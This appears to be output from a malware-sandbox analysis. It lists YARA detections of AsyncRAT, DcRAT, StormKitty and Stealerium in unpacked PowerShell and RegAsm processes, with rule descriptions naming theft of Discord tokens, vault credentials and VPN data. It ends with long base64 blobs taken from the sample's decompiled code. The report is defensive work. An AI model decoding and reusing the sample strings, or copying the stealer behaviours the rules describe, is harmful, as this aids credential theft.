Source: 6.2.powershell.exe.5b4acca.9.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 6.2.powershell.exe.5b4acca.9.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_stealerium author = Sekoia.io, description = Detects Stealerium based on specific strings, creation_date = 2022-12-01, classification = TLP:CLEAR, version = 1.0, id = 165c7d3d-de7e-4d71-b94a-8ab4a0e5ddd5
Source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_stormkitty author = Sekoia.io, description = Finds StormKitty samples (or their variants) based on specific strings, creation_date = 2023-03-29, classification = TLP:CLEAR, version = 1.0, id = 5014d2e5-af5c-4800-ab1e-b57de37a2450
Source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: rat_win_dcrat_qwqdanchun author = Sekoia.io, description = Find DcRAT samples (qwqdanchun) based on specific strings, creation_date = 2023-01-26, classification = TLP:CLEAR, version = 1.0, reference = https://github.com/qwqdanchun/DcRat, id = 8206a410-48b3-425f-9dcb-7a528673a37a
Source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
Source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
Source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 11.2.RegAsm.exe.525b8a.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: 11.2.RegAsm.exe.525b8a.1.raw.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_stealerium author = Sekoia.io, description = Detects Stealerium based on specific strings, creation_date = 2022-12-01, classification = TLP:CLEAR, version = 1.0, id = 165c7d3d-de7e-4d71-b94a-8ab4a0e5ddd5
Source: 11.2.RegAsm.exe.525b8a.1.raw.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_stormkitty author = Sekoia.io, description = Finds StormKitty samples (or their variants) based on specific strings, creation_date = 2023-03-29, classification = TLP:CLEAR, version = 1.0, id = 5014d2e5-af5c-4800-ab1e-b57de37a2450
Source: 11.2.RegAsm.exe.525b8a.1.raw.unpack, type: UNPACKEDPE	Matched rule: rat_win_dcrat_qwqdanchun author = Sekoia.io, description = Find DcRAT samples (qwqdanchun) based on specific strings, creation_date = 2023-01-26, classification = TLP:CLEAR, version = 1.0, reference = https://github.com/qwqdanchun/DcRat, id = 8206a410-48b3-425f-9dcb-7a528673a37a
Source: 11.2.RegAsm.exe.525b8a.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 11.2.RegAsm.exe.525b8a.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 11.2.RegAsm.exe.525b8a.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 11.2.RegAsm.exe.525b8a.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
Source: 11.2.RegAsm.exe.525b8a.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 11.2.RegAsm.exe.525b8a.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 6.2.powershell.exe.623872a.8.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: 6.2.powershell.exe.623872a.8.raw.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_stealerium author = Sekoia.io, description = Detects Stealerium based on specific strings, creation_date = 2022-12-01, classification = TLP:CLEAR, version = 1.0, id = 165c7d3d-de7e-4d71-b94a-8ab4a0e5ddd5
Source: 6.2.powershell.exe.623872a.8.raw.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_stormkitty author = Sekoia.io, description = Finds StormKitty samples (or their variants) based on specific strings, creation_date = 2023-03-29, classification = TLP:CLEAR, version = 1.0, id = 5014d2e5-af5c-4800-ab1e-b57de37a2450
Source: 6.2.powershell.exe.623872a.8.raw.unpack, type: UNPACKEDPE	Matched rule: rat_win_dcrat_qwqdanchun author = Sekoia.io, description = Find DcRAT samples (qwqdanchun) based on specific strings, creation_date = 2023-01-26, classification = TLP:CLEAR, version = 1.0, reference = https://github.com/qwqdanchun/DcRat, id = 8206a410-48b3-425f-9dcb-7a528673a37a
Source: 6.2.powershell.exe.623872a.8.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 6.2.powershell.exe.623872a.8.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 6.2.powershell.exe.623872a.8.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 6.2.powershell.exe.623872a.8.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
Source: 6.2.powershell.exe.623872a.8.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 6.2.powershell.exe.623872a.8.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 6.2.powershell.exe.5e16f80.6.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: 6.2.powershell.exe.5e16f80.6.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_stealerium author = Sekoia.io, description = Detects Stealerium based on specific strings, creation_date = 2022-12-01, classification = TLP:CLEAR, version = 1.0, id = 165c7d3d-de7e-4d71-b94a-8ab4a0e5ddd5
Source: 6.2.powershell.exe.5e16f80.6.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_stormkitty author = Sekoia.io, description = Finds StormKitty samples (or their variants) based on specific strings, creation_date = 2023-03-29, classification = TLP:CLEAR, version = 1.0, id = 5014d2e5-af5c-4800-ab1e-b57de37a2450
Source: 6.2.powershell.exe.5e16f80.6.unpack, type: UNPACKEDPE	Matched rule: rat_win_dcrat_qwqdanchun author = Sekoia.io, description = Find DcRAT samples (qwqdanchun) based on specific strings, creation_date = 2023-01-26, classification = TLP:CLEAR, version = 1.0, reference = https://github.com/qwqdanchun/DcRat, id = 8206a410-48b3-425f-9dcb-7a528673a37a
Source: 6.2.powershell.exe.5e16f80.6.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 6.2.powershell.exe.5e16f80.6.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 6.2.powershell.exe.5e16f80.6.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 6.2.powershell.exe.5e16f80.6.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
Source: 6.2.powershell.exe.5e16f80.6.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 6.2.powershell.exe.5e16f80.6.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
Source: 6.2.powershell.exe.5e16f80.6.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 6.2.powershell.exe.5f3ad0a.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: 6.2.powershell.exe.5f3ad0a.7.raw.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_stealerium author = Sekoia.io, description = Detects Stealerium based on specific strings, creation_date = 2022-12-01, classification = TLP:CLEAR, version = 1.0, id = 165c7d3d-de7e-4d71-b94a-8ab4a0e5ddd5
Source: 6.2.powershell.exe.5f3ad0a.7.raw.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_stormkitty author = Sekoia.io, description = Finds StormKitty samples (or their variants) based on specific strings, creation_date = 2023-03-29, classification = TLP:CLEAR, version = 1.0, id = 5014d2e5-af5c-4800-ab1e-b57de37a2450
Source: 6.2.powershell.exe.5f3ad0a.7.raw.unpack, type: UNPACKEDPE	Matched rule: rat_win_dcrat_qwqdanchun author = Sekoia.io, description = Find DcRAT samples (qwqdanchun) based on specific strings, creation_date = 2023-01-26, classification = TLP:CLEAR, version = 1.0, reference = https://github.com/qwqdanchun/DcRat, id = 8206a410-48b3-425f-9dcb-7a528673a37a
Source: 6.2.powershell.exe.5f3ad0a.7.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 6.2.powershell.exe.5f3ad0a.7.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 6.2.powershell.exe.5f3ad0a.7.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 6.2.powershell.exe.5f3ad0a.7.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
Source: 6.2.powershell.exe.5f3ad0a.7.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 6.2.powershell.exe.5f3ad0a.7.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
Source: 6.2.powershell.exe.5f3ad0a.7.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 6.2.powershell.exe.5e16f80.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: 6.2.powershell.exe.5e16f80.6.raw.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_stealerium author = Sekoia.io, description = Detects Stealerium based on specific strings, creation_date = 2022-12-01, classification = TLP:CLEAR, version = 1.0, id = 165c7d3d-de7e-4d71-b94a-8ab4a0e5ddd5
Source: 6.2.powershell.exe.5e16f80.6.raw.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_stormkitty author = Sekoia.io, description = Finds StormKitty samples (or their variants) based on specific strings, creation_date = 2023-03-29, classification = TLP:CLEAR, version = 1.0, id = 5014d2e5-af5c-4800-ab1e-b57de37a2450
Source: 6.2.powershell.exe.5e16f80.6.raw.unpack, type: UNPACKEDPE	Matched rule: rat_win_dcrat_qwqdanchun author = Sekoia.io, description = Find DcRAT samples (qwqdanchun) based on specific strings, creation_date = 2023-01-26, classification = TLP:CLEAR, version = 1.0, reference = https://github.com/qwqdanchun/DcRat, id = 8206a410-48b3-425f-9dcb-7a528673a37a
Source: 6.2.powershell.exe.5e16f80.6.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 6.2.powershell.exe.5e16f80.6.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 6.2.powershell.exe.5e16f80.6.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 6.2.powershell.exe.5e16f80.6.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
Source: 6.2.powershell.exe.5e16f80.6.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 6.2.powershell.exe.5e16f80.6.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
Source: 6.2.powershell.exe.5e16f80.6.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000006.00000002.1753216083.0000000004DE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000000B.00000002.4110519475.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: 0000000B.00000002.4110519475.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 0000000B.00000002.4110519475.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000006.00000002.1761139997.0000000005E16000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: 00000006.00000002.1761139997.0000000005E16000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 00000006.00000002.1761139997.0000000005E16000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000006.00000002.1761139997.0000000005939000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: 00000006.00000002.1761139997.0000000005939000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 00000006.00000002.1761139997.0000000005939000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: Process Memory Space: powershell.exe PID: 7424, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7728, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7728, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: Process Memory Space: powershell.exe PID: 7728, type: MEMORYSTR	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: Process Memory Space: RegAsm.exe PID: 7940, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: Process Memory Space: RegAsm.exe PID: 7940, type: MEMORYSTR	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT

Source: 6.2.powershell.exe.8100000.11.raw.unpack, ClasserPlus.cs	Base64 encoded string: 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'
Source: 6.2.powershell.exe.4a53f3c.2.raw.unpack, Knvbl.cs	Base64 encoded string: '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
Source: 6.2.powershell.exe.4de0a2c.3.raw.unpack, Knvbl.cs	Base64 encoded string: 'GS4NWlljHhw7Nx5BV29/TTNPBkFMDh1HSiYgSwwqGksCDQZMKUUbHWFXEUdXLSpFGzoIWAkPW3EPHWUsGS4NWlljHhw7Nx5BQiwQTHsrYlMfNApTHhA0FjwmFgI+FxtMKUsNCCUzEFFMLD02LTENRQ8HBgNNLB1VBTMDFG06PhEtLlV4BBAQWSRPBkFCCQVHVTB2aEJOcVwZABlRIwYLSg0uFxR9LywWOyYJfAAXBjVKXWUsTH1EFE42LwkhIFtfGAMBUSMGIUgYbFIUfSwjEy0xD3gDKxtMcRBARBUpAW9jYzsEJDYeAEwLG0xgVRxHHiktWlomNUxFSVsMTEIONUoGSAZMfUQUHjEoET0xFQwuCwF7L0geQx4pAUYQFyIsJjdKGkQUFFQ1Q0QGHykFRkoKIwEtO1IXYWhVGGAGFStmUG4UHmNtFT0hF0UPQgZMIVIBRUwUCkANcW0mJy0NSR4WIVcJSBwVXnUGTUomFjhoNRpAGQdZGClIHAYfKQVGSgojAS07UiFmQlUYYF1lLEx9RBQeY21FOiYPWR4MVXopUitJAisBRkomP0scLDJCGFFHEDZHBFMJcURHSiI/EQEtH0kUS041SgZIBkwgaT4zSW1FaGMLWQ4OHFtgVRxHGDQHFFw6OQATHltvAwwDXTJSPEkuJBBRTWskCzxjDU0AFxARTSxIBkx9Hzk0Y21FaGNbDEwQEEw1VAYGLjQQd1EtOwA6Nx5eQiUQTAJfHEMfdRJVUjYoTHNOcQxMQlVFTSxlLEx9RBRONi8JISBbXxgDAVEjBhtSHjQKU2UebSItNzpcBSwUVSVVQA9hV0QUHmM2aEJjWwxMQlUYYFQNUhkvChRQJjpFOzcJRQIFLmVNLEgGTH1EFB5jNmhCY1sMTEJVGGAGSAZMfw9RTC0oCXtxWQBhaFUYYAZIBkx9RBQeY28LPCcXQE5OeDJgBkgGTH1EFB5jbUVqER5fGQ8QbChUDUcIf0g5NGNtRWhjWwxMQlUYYA